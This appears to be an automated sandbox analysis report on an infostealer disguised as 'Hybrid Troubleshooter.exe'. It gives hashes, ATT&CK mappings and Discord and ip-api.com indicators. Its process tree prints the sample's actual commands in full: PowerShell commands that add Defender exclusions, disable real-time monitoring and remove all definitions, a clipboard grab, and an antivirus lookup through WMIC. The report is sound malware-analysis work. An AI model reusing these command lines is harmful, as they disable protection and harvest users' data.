b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee

Analysis

max time kernel
96s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2024 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hybrid Troubleshooter.exe
Size

6.0MB
MD5

7b6bf2e9439976470abed7e28aeb7e50
SHA1

79ced0071d376428aa98d951e2524845bd1d87b1
SHA256

b3dff4a7df3913a8ba790c89e44526bb71951f7e9ca0d321b026080ff57780ee
SHA512

b4e0ebff67876398a38f2ef05c6d3b07443b311298549fa1681c49653b5f018b71f63af7d309ce40c6c2a2084572119c9aa02ffb44d4b4e4046a612ae105fa39
SSDEEP

98304:4jcZrXqkqSnWyL4afkhk9Y+YNwh1SMCJbzRnPJ8iE/56YiaDJ1n6hB0LncZMn:9R9L4ack9Y7m7SMYNPKBFn6hqgi

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
980	powershell.exe
4616	powershell.exe
4224	powershell.exe
2568	powershell.exe
4780	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023c8f-21.dat	acprotect
behavioral2/files/0x0007000000023c82-27.dat	acprotect
behavioral2/files/0x0007000000023c8d-29.dat	acprotect
behavioral2/files/0x0007000000023c83-42.dat	acprotect
behavioral2/files/0x0007000000023c81-41.dat	acprotect
behavioral2/files/0x0007000000023c94-40.dat	acprotect
behavioral2/files/0x0007000000023c93-39.dat	acprotect
behavioral2/files/0x0007000000023c92-38.dat	acprotect
behavioral2/files/0x0007000000023c8e-35.dat	acprotect
behavioral2/files/0x0007000000023c8c-34.dat	acprotect
behavioral2/files/0x0007000000023c89-48.dat	acprotect
behavioral2/files/0x0007000000023c88-47.dat	acprotect
behavioral2/files/0x0007000000023c87-46.dat	acprotect
behavioral2/files/0x0007000000023c86-45.dat	acprotect
behavioral2/files/0x0007000000023c85-44.dat	acprotect
behavioral2/files/0x0007000000023c84-43.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
548	cmd.exe
1316	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3876	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe
2600	Hybrid Troubleshooter.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4952	tasklist.exe
4220	tasklist.exe
1820	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c8f-21.dat	upx
behavioral2/memory/2600-25-0x0000000075100000-0x000000007560A000-memory.dmp	upx
behavioral2/files/0x0007000000023c82-27.dat	upx
behavioral2/memory/2600-30-0x00000000750B0000-0x00000000750CF000-memory.dmp	upx
behavioral2/files/0x0007000000023c8d-29.dat	upx
behavioral2/memory/2600-32-0x00000000750A0000-0x00000000750AD000-memory.dmp	upx
behavioral2/files/0x0007000000023c83-42.dat	upx
behavioral2/files/0x0007000000023c81-41.dat	upx
behavioral2/files/0x0007000000023c94-40.dat	upx
behavioral2/files/0x0007000000023c93-39.dat	upx
behavioral2/files/0x0007000000023c92-38.dat	upx
behavioral2/files/0x0007000000023c8e-35.dat	upx
behavioral2/files/0x0007000000023c8c-34.dat	upx
behavioral2/files/0x0007000000023c89-48.dat	upx
behavioral2/files/0x0007000000023c88-47.dat	upx
behavioral2/files/0x0007000000023c87-46.dat	upx
behavioral2/files/0x0007000000023c86-45.dat	upx
behavioral2/files/0x0007000000023c85-44.dat	upx
behavioral2/files/0x0007000000023c84-43.dat	upx
behavioral2/memory/2600-54-0x0000000075070000-0x0000000075097000-memory.dmp	upx
behavioral2/memory/2600-56-0x0000000075050000-0x0000000075068000-memory.dmp	upx
behavioral2/memory/2600-58-0x0000000075030000-0x000000007504B000-memory.dmp	upx
behavioral2/memory/2600-60-0x0000000074EF0000-0x0000000075026000-memory.dmp	upx
behavioral2/memory/2600-62-0x0000000074ED0000-0x0000000074EE6000-memory.dmp	upx
behavioral2/memory/2600-64-0x0000000074E80000-0x0000000074E8C000-memory.dmp	upx
behavioral2/memory/2600-66-0x0000000074E50000-0x0000000074E78000-memory.dmp	upx
behavioral2/memory/2600-74-0x00000000750B0000-0x00000000750CF000-memory.dmp	upx
behavioral2/memory/2600-72-0x0000000074B50000-0x0000000074DAA000-memory.dmp	upx
behavioral2/memory/2600-71-0x0000000074DB0000-0x0000000074E44000-memory.dmp	upx
behavioral2/memory/2600-70-0x0000000075100000-0x000000007560A000-memory.dmp	upx
behavioral2/memory/2600-79-0x0000000074AD0000-0x0000000074ADC000-memory.dmp	upx
behavioral2/memory/2600-78-0x0000000075070000-0x0000000075097000-memory.dmp	upx
behavioral2/memory/2600-76-0x0000000074AE0000-0x0000000074AF0000-memory.dmp	upx
behavioral2/memory/2600-83-0x0000000075050000-0x0000000075068000-memory.dmp	upx
behavioral2/memory/2600-84-0x00000000749B0000-0x0000000074AC8000-memory.dmp	upx
behavioral2/memory/2600-140-0x0000000075030000-0x000000007504B000-memory.dmp	upx
behavioral2/memory/2600-191-0x0000000074EF0000-0x0000000075026000-memory.dmp	upx
behavioral2/memory/2600-205-0x0000000074ED0000-0x0000000074EE6000-memory.dmp	upx
behavioral2/memory/2600-275-0x0000000074E50000-0x0000000074E78000-memory.dmp	upx
behavioral2/memory/2600-303-0x0000000074B50000-0x0000000074DAA000-memory.dmp	upx
behavioral2/memory/2600-302-0x0000000074DB0000-0x0000000074E44000-memory.dmp	upx
behavioral2/memory/2600-350-0x00000000750B0000-0x00000000750CF000-memory.dmp	upx
behavioral2/memory/2600-349-0x0000000075100000-0x000000007560A000-memory.dmp	upx
behavioral2/memory/2600-355-0x0000000074EF0000-0x0000000075026000-memory.dmp	upx
behavioral2/memory/2600-386-0x0000000075100000-0x000000007560A000-memory.dmp	upx
behavioral2/memory/2600-416-0x0000000075100000-0x000000007560A000-memory.dmp	upx
behavioral2/memory/2600-440-0x0000000074DB0000-0x0000000074E44000-memory.dmp	upx
behavioral2/memory/2600-444-0x00000000749B0000-0x0000000074AC8000-memory.dmp	upx
behavioral2/memory/2600-443-0x0000000074AD0000-0x0000000074ADC000-memory.dmp	upx
behavioral2/memory/2600-442-0x0000000074AE0000-0x0000000074AF0000-memory.dmp	upx
behavioral2/memory/2600-441-0x0000000074B50000-0x0000000074DAA000-memory.dmp	upx
behavioral2/memory/2600-439-0x0000000074E50000-0x0000000074E78000-memory.dmp	upx
behavioral2/memory/2600-438-0x0000000074E80000-0x0000000074E8C000-memory.dmp	upx
behavioral2/memory/2600-437-0x0000000074ED0000-0x0000000074EE6000-memory.dmp	upx
behavioral2/memory/2600-436-0x0000000074EF0000-0x0000000075026000-memory.dmp	upx
behavioral2/memory/2600-435-0x0000000075030000-0x000000007504B000-memory.dmp	upx
behavioral2/memory/2600-434-0x0000000075050000-0x0000000075068000-memory.dmp	upx
behavioral2/memory/2600-433-0x0000000075070000-0x0000000075097000-memory.dmp	upx
behavioral2/memory/2600-432-0x00000000750A0000-0x00000000750AD000-memory.dmp	upx
behavioral2/memory/2600-431-0x00000000750B0000-0x00000000750CF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hybrid Troubleshooter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hybrid Troubleshooter.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2828	cmd.exe
4800	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3924	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4524	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4224	powershell.exe
4616	powershell.exe
980	powershell.exe
4616	powershell.exe
4616	powershell.exe
980	powershell.exe
980	powershell.exe
4224	powershell.exe
4224	powershell.exe
1316	powershell.exe
1316	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
1316	powershell.exe
2568	powershell.exe
2568	powershell.exe
2568	powershell.exe
2840	powershell.exe
2840	powershell.exe
4780	powershell.exe
4780	powershell.exe
2716	powershell.exe
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	4220	tasklist.exe
Token: SeDebugPrivilege	4952	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeIncreaseQuotaPrivilege	1936	WMIC.exe
Token: SeSecurityPrivilege	1936	WMIC.exe
Token: SeTakeOwnershipPrivilege	1936	WMIC.exe
Token: SeLoadDriverPrivilege	1936	WMIC.exe
Token: SeSystemProfilePrivilege	1936	WMIC.exe
Token: SeSystemtimePrivilege	1936	WMIC.exe
Token: SeProfSingleProcessPrivilege	1936	WMIC.exe
Token: SeIncBasePriorityPrivilege	1936	WMIC.exe
Token: SeCreatePagefilePrivilege	1936	WMIC.exe
Token: SeBackupPrivilege	1936	WMIC.exe
Token: SeRestorePrivilege	1936	WMIC.exe
Token: SeShutdownPrivilege	1936	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 2600	4836	Hybrid Troubleshooter.exe	83
PID 4836 wrote to memory of 2600	4836	Hybrid Troubleshooter.exe	83
PID 4836 wrote to memory of 2600	4836	Hybrid Troubleshooter.exe	83
PID 2600 wrote to memory of 5024	2600	Hybrid Troubleshooter.exe	84
PID 2600 wrote to memory of 5024	2600	Hybrid Troubleshooter.exe	84
PID 2600 wrote to memory of 5024	2600	Hybrid Troubleshooter.exe	84
PID 2600 wrote to memory of 2872	2600	Hybrid Troubleshooter.exe	85
PID 2600 wrote to memory of 2872	2600	Hybrid Troubleshooter.exe	85
PID 2600 wrote to memory of 2872	2600	Hybrid Troubleshooter.exe	85
PID 2600 wrote to memory of 1436	2600	Hybrid Troubleshooter.exe	87
PID 2600 wrote to memory of 1436	2600	Hybrid Troubleshooter.exe	87
PID 2600 wrote to memory of 1436	2600	Hybrid Troubleshooter.exe	87
PID 5024 wrote to memory of 980	5024	cmd.exe	90
PID 5024 wrote to memory of 980	5024	cmd.exe	90
PID 5024 wrote to memory of 980	5024	cmd.exe	90
PID 2872 wrote to memory of 4224	2872	cmd.exe	91
PID 2872 wrote to memory of 4224	2872	cmd.exe	91
PID 2872 wrote to memory of 4224	2872	cmd.exe	91
PID 1436 wrote to memory of 4616	1436	cmd.exe	92
PID 1436 wrote to memory of 4616	1436	cmd.exe	92
PID 1436 wrote to memory of 4616	1436	cmd.exe	92
PID 2600 wrote to memory of 948	2600	Hybrid Troubleshooter.exe	93
PID 2600 wrote to memory of 948	2600	Hybrid Troubleshooter.exe	93
PID 2600 wrote to memory of 948	2600	Hybrid Troubleshooter.exe	93
PID 2600 wrote to memory of 4216	2600	Hybrid Troubleshooter.exe	94
PID 2600 wrote to memory of 4216	2600	Hybrid Troubleshooter.exe	94
PID 2600 wrote to memory of 4216	2600	Hybrid Troubleshooter.exe	94
PID 2600 wrote to memory of 4428	2600	Hybrid Troubleshooter.exe	97
PID 2600 wrote to memory of 4428	2600	Hybrid Troubleshooter.exe	97
PID 2600 wrote to memory of 4428	2600	Hybrid Troubleshooter.exe	97
PID 2600 wrote to memory of 548	2600	Hybrid Troubleshooter.exe	99
PID 2600 wrote to memory of 548	2600	Hybrid Troubleshooter.exe	99
PID 2600 wrote to memory of 548	2600	Hybrid Troubleshooter.exe	99
PID 948 wrote to memory of 4220	948	cmd.exe	100
PID 948 wrote to memory of 4220	948	cmd.exe	100
PID 948 wrote to memory of 4220	948	cmd.exe	100
PID 2600 wrote to memory of 2328	2600	Hybrid Troubleshooter.exe	101
PID 2600 wrote to memory of 2328	2600	Hybrid Troubleshooter.exe	101
PID 2600 wrote to memory of 2328	2600	Hybrid Troubleshooter.exe	101
PID 2600 wrote to memory of 5100	2600	Hybrid Troubleshooter.exe	103
PID 2600 wrote to memory of 5100	2600	Hybrid Troubleshooter.exe	103
PID 2600 wrote to memory of 5100	2600	Hybrid Troubleshooter.exe	103
PID 2600 wrote to memory of 2828	2600	Hybrid Troubleshooter.exe	135
PID 2600 wrote to memory of 2828	2600	Hybrid Troubleshooter.exe	135
PID 2600 wrote to memory of 2828	2600	Hybrid Troubleshooter.exe	135
PID 2600 wrote to memory of 868	2600	Hybrid Troubleshooter.exe	107
PID 2600 wrote to memory of 868	2600	Hybrid Troubleshooter.exe	107
PID 2600 wrote to memory of 868	2600	Hybrid Troubleshooter.exe	107
PID 4216 wrote to memory of 4952	4216	cmd.exe	108
PID 4216 wrote to memory of 4952	4216	cmd.exe	108
PID 4216 wrote to memory of 4952	4216	cmd.exe	108
PID 2600 wrote to memory of 2204	2600	Hybrid Troubleshooter.exe	109
PID 2600 wrote to memory of 2204	2600	Hybrid Troubleshooter.exe	109
PID 2600 wrote to memory of 2204	2600	Hybrid Troubleshooter.exe	109
PID 4428 wrote to memory of 4816	4428	cmd.exe	112
PID 4428 wrote to memory of 4816	4428	cmd.exe	112
PID 4428 wrote to memory of 4816	4428	cmd.exe	112
PID 2328 wrote to memory of 1820	2328	cmd.exe	114
PID 2328 wrote to memory of 1820	2328	cmd.exe	114
PID 2328 wrote to memory of 1820	2328	cmd.exe	114
PID 548 wrote to memory of 1316	548	cmd.exe	115
PID 548 wrote to memory of 1316	548	cmd.exe	115
PID 548 wrote to memory of 1316	548	cmd.exe	115
PID 5100 wrote to memory of 1624	5100	cmd.exe	146

C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe
"C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe" rip bitch
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe
  "C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe" rip bitch
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5024
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hybrid Troubleshooter.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2872
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1436
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4216
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
